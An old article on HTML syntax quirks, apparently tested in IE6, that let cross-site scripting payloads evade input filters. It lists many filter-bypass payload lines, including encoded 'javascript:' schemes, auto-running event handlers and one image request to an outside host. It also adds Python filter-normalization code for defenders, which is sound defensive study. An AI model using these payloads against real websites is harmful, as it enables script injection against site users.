
Features of HTML Syntax

Authors: Algol, zFailure. Last changed 13.06.2005

One of the main ways of protecting sites against XSS vulnerabilities is filtering certain characters out of user input. This article describes features of HTML syntax that allow such filters to be bypassed.

Note that XSS vulnerabilities are browser-dependent. All the examples below were tested in IE6; in other versions or in other browsers they may not work. For example, the backtick (`) is an attribute-value delimiter only in IE: other browsers, such as Opera, do not treat this character as a delimiter at all.

  • Delimiters between tag attributes.
    Besides the space, the slash ( / ), the tab and the line feed are accepted as delimiters. The delimiter may be omitted entirely if the preceding attribute value is enclosed in quotes.
     <image/src="1.png"/alt="Hint"/border="0">
     <image src="1.png"alt="Tip"border="0"> (no delimiter after a quoted value)
     <image
     src="1.png"
     alt="Hint"
     border="0">
     <image<tab>src="1.png"<tab>alt="Tip"<tab>border="0"> (<tab> stands for the tab character)
    
  • Attribute value delimiters
    A value may be enclosed in double quotes, in single quotes (apostrophes) or in backticks, or left undelimited altogether.
     <image src="" alt="My tip" border="0">
     <image src="" alt='My tip' border="0">
     <image src="" alt=`My tip` border="0">
     <image src="" alt=Tip border="0">
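The two sections above describe why a filter that looks for attributes separated by whitespace sees a different tag than the browser does. The following is an added example, not code from the original article: a small attribute tokenizer (a hypothetical helper, not a full HTML tokenizer) that follows exactly the delimiter rules listed above, placed next to the kind of whitespace-anchored regex check those rules defeat. The sample tags are the article's own.

```python
import re

# Added example: tokenize a start tag using the delimiter rules the
# article lists (space, tab, line feed, slash; delimiter optional after a
# quoted value; values in ", ' or backticks, or unquoted).

DELIMS = " \t\n\r/"   # delimiters between attributes (slash is IE behaviour)
WS = " \t\n\r"        # whitespace tolerated around '='
QUOTES = "\"'`"       # value delimiters: double quote, apostrophe, backtick


def parse_attributes(tag):
    """Return (tag_name, [(attr_name, value), ...]) for one start tag.

    Hypothetical helper written for this page; it models the syntax the
    article describes, not the complete HTML5 tokenizer."""
    body = tag.strip()
    if not (body.startswith("<") and body.endswith(">")):
        raise ValueError("expected a single start tag")
    body = body[1:-1]
    i, n = 0, len(body)
    while i < n and body[i] not in DELIMS:       # tag name runs to first delimiter
        i += 1
    name = body[:i].lower()
    attrs = []
    while i < n:
        while i < n and body[i] in DELIMS:       # any run of delimiters
            i += 1
        if i >= n:
            break
        start = i
        while i < n and body[i] not in DELIMS and body[i] != "=":
            i += 1
        attr = body[start:i].lower()
        j = i
        while j < n and body[j] in WS:
            j += 1
        value = None
        if j < n and body[j] == "=":
            i = j + 1
            while i < n and body[i] in WS:
                i += 1
            if i < n and body[i] in QUOTES:
                quote = body[i]
                end = body.find(quote, i + 1)
                if end == -1:
                    end = n
                value = body[i + 1:end]
                i = end + 1                      # no delimiter needed after a quoted value
            else:
                start = i
                while i < n and body[i] not in DELIMS:
                    i += 1
                value = body[start:i]
        if attr:
            attrs.append((attr, value))
    return name, attrs


def event_handlers(tag):
    """Names of on* attributes the tokenizer finds, whatever delimiter was used."""
    _, attrs = parse_attributes(tag)
    return [attr for attr, _ in attrs if attr.startswith("on")]


def naive_handler_check(tag):
    """A whitespace-anchored regex: the check a slash or an omitted delimiter defeats."""
    return re.search(r"\son[a-z]+\s*=", tag, re.I) is not None


if __name__ == "__main__":
    for sample in ('<image/src="1.png"/alt="Hint"/border="0">',
                   '<image src="1.png"alt="Tip"border="0">',
                   '<image src=""/onerror=alert(\'ok\')>'):
        print(sample, parse_attributes(sample), naive_handler_check(sample))
```

The practical lesson is that an input filter must tokenize attributes the way the target browser does (or, better, not try to police tag syntax at all and instead encode untrusted data on output); matching on the whitespace that happens to appear in the raw string is not a reliable check.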
    
  • Character encodings
    Character references in the script are decoded before it is executed:
     <img src=javascript:alert(&quot;ok&quot;)>
     <img src=javascript:alert(&#039;ok&#039;)>
     <a href=javascript:alert(%22ok%22)>click me</a> (URL-encoding is decoded only in the href attribute)
    
    
  • Delimiters of string literals in scripts
     <img src=javascript:alert('ok')>
     <img src=javascript:alert("ok")>
     <img src=javascript:a=/ok/;alert(a.source)>
     <img src=javascript:alert(String.fromCharCode(111,107))>
    
  • Bypassing the filtering of individual characters
     <img src=javascript:i=new/**/Image();i.src='http://bla.bla'> (the space is replaced by the comment /**/)
    
    
  • Ways to run scripts
    Several ways of running a script automatically:
     <script>alert('ok')</script>
     <script src=1.js></script>
     <body onLoad=alert('ok')>
     <meta http-equiv=Refresh content=0;url=javascript:alert('ok')>
     <image src=1.png onload=alert('ok')>
     <image src=javascript:alert('ok')>
     <image src="" onerror=alert('ok')>
     <hr style=background:url(javascript:alert('ok'))>
     <span style=top:expression(alert('ok'))></span>
     <span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span> (works only once)
     <style type="text/css">@import url(javascript:alert('ok'));</style>
     <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>
     <embed src=javascript:alert('ok');this.avi>
     <embed src=javascript:alert('ok');this.wav>
     <iframe src=javascript:alert('ok')> (IE only)
     <a href=javascript:alert(%22ok%22)>click me</a> (runs only when the link is clicked)
     <a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a> (runs only when the link is clicked)
     <br SIZE="&{alert('XSS')}"> (Netscape 4.x only)
    
    
  • Script protocols and the ways of writing them
     <img src=javascript:alert()>
     <img src=vbscript:AleRt()>
     <img src=JaVasCriPt:alert()>
     <img src="   javascript:alert()"> (spaces before javascript)

     <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>
     <img src=javascript&#9:alert()>
     <img src=javascript&#10:alert()>
     <img src=javascript&#13:alert()>
     <img src="javascript
     :alert()"> (a tab character before the colon)

     <img src="java
     scri
     pt:ale
     rt()"> (tab and carriage-return characters inside the word javascript)
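The "Character encodings" section above and this one make the same point from two sides: the browser decodes character references, drops tab, line feed and carriage return inside the scheme, ignores leading whitespace and compares the scheme case-insensitively before it ever executes anything, so a filter has to perform the same normalization before it inspects a URL attribute. The block below is an added example, not code from the original article: a normalizer for src/href values that applies those steps and then checks the scheme, beside the raw substring test that every variant listed above slips past. The helper names are hypothetical; percent-decoding is applied only for href, as the article states, and doing so before the scheme check is a deliberate over-approximation for a filter.

```python
import re
from urllib.parse import unquote

# Added example: normalize a URL-type attribute value the way the article
# says browsers treat it, then inspect the scheme. Helper names are
# hypothetical; the sample values are the article's own.

# Named references from the article's table, plus apos.
NAMED = {"quot": '"', "apos": "'", "lt": "<", "gt": ">", "amp": "&", "shy": "\u00ad"}
# Decimal, hexadecimal or named reference; the trailing semicolon is optional.
_REF = re.compile(r"&(?:#(\d+)|#[xX]([0-9a-fA-F]+)|([A-Za-z]+));?")
SCRIPT_SCHEMES = {"javascript", "vbscript"}


def decode_entities(value):
    """Decode character references in one pass, as the HTML parser does."""
    def repl(m):
        dec, hexv, name = m.groups()
        if dec or hexv:
            code = int(dec) if dec else int(hexv, 16)
            return chr(code) if code <= 0x10FFFF else "\ufffd"
        return NAMED.get(name, m.group(0))      # unknown names stay literal
    return _REF.sub(repl, value)


def normalize_url(value, attr="src"):
    """Entity-decode, (for href) percent-decode, drop tab/LF/CR, trim the start."""
    text = decode_entities(value)
    if attr == "href":
        text = unquote(text)                    # %XX decoding only applies in href
    text = re.sub(r"[\t\n\r]", "", text)        # ignored anywhere in the scheme
    return re.sub(r"^[\x00-\x20]+", "", text)   # leading spaces/controls dropped


def is_script_url(value, attr="src"):
    """True when the normalized value's scheme is javascript: or vbscript:."""
    scheme, sep, _ = normalize_url(value, attr).partition(":")
    return bool(sep) and scheme.lower() in SCRIPT_SCHEMES


def naive_check(value):
    """The raw substring test that the variants above slip past."""
    return "javascript:" in value


if __name__ == "__main__":
    for sample in ("JaVasCriPt:alert()", "javascript&#9:alert()",
                   "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()",
                   "   javascript:alert()", "http://bla.bla"):
        print(repr(sample), "naive:", naive_check(sample), "normalized:", is_script_url(sample))
```

A positive rule is the robust end state: after normalization, accept only the schemes the application actually needs (http, https, mailto, relative paths) and reject everything else, rather than enumerating dangerous spellings.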
     
    
  • Inserting scripts into style
    Script statements inside the style attribute must be separated by " \; ".
     <hr style=`background:url(javascript:alert('ok 1')\;alert('ok 2'))`>
    
  • Special tags.
     <image src="1.png" alt="" border="0"> (works the same way as img)
     <plaintext> (everything after this tag is treated as plain text, not HTML)
     <textarea> (everything after this tag is treated as plain text, not HTML)
     <xml> (everything after this tag is not displayed at all)
    
    
  • Table of frequently used codes:

    Symbol             Decimal   Hexadecimal *   Named entity   URL-encoding
    "                  &#34      &#x22;          &quot;         %22
    '                  &#39      &#x27;                         %27
    `                  &#96      &#x60;                         %60
    <space>            &#32      &#x20;                         +
    <tab>              &#9       &#x09;                         %09
    <carriage return>  &#13      &#x0D;                         %0D
    =                  &#61      &#x3D;                         %3D
    <                  &#60      &#x3C;          &lt;           %3C
    >                  &#62      &#x3E;          &gt;           %3E
    \                  &#92      &#x5C;                         %5C
    %                  &#37      &#x25;                         %25
    +                  &#43      &#x2B;                         %2B
    <soft hyphen>      &#173     &#xAD;          &shy;          %AD
    &                  &#38      &#x26;          &amp;          %26

    * In some cases the semicolon may be omitted (when the character reference is at the end of the line, or when several references of this kind follow one another).

    See also: http://ha.ckers.org/xss.html